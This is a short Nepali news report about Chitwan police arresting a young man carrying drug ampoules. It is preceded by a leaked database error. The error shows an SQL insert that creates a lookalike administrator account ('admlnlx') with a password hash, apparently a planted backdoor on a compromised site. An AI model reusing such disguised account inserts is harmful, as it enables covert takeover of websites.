WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXbs1UwgYT66hRGB8Nl4Uv5WRRJZw20', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 04:39:53', '', 'admlnlx', 'admlnlx')
चितवन, माघ १३–
जिल्ला प्रहरी कार्यालय चितवनले लागुऔषधसहित एक युवालाई पक्राउ गरेको छ ।
भरतपुर उपमहानगरपालिका–१० स्थित मैयाँदेवी कन्या कलेज रोडबाट लागुऔषधसहित भरतपुर–१९ बस्ने २५ वर्षीय तामाङलाई प्रहरीले लागुऔषधसहित पक्राउ गरेको हो । प्रहरीले तामाङमाथि शंका लागेपछि खोजतलासी गर्दा डाईजोपाम १३ एम्पुल, फेनारगन १३ एम्पुल र ब्युर्फिनोर्फिन १३ एम्पुल बरामद गरेको छ । प्रहरीले चितवन अदालतमा लागु औषध नियन्त्रण ऐन २०३३ अनुसार म्याद थप गरी अनुसन्धान गरिरहेको छ ।
जिल्ला प्रहरी कार्यालय चितवनले जिल्लामा लागु औषध विक्री वितरण एवंम् सेवन नियन्त्रण अभियान तिब्र बनाएको प्रहरी उपरीक्षक दीपक थापाले बताउनुभयो ।
फोटोः फाईल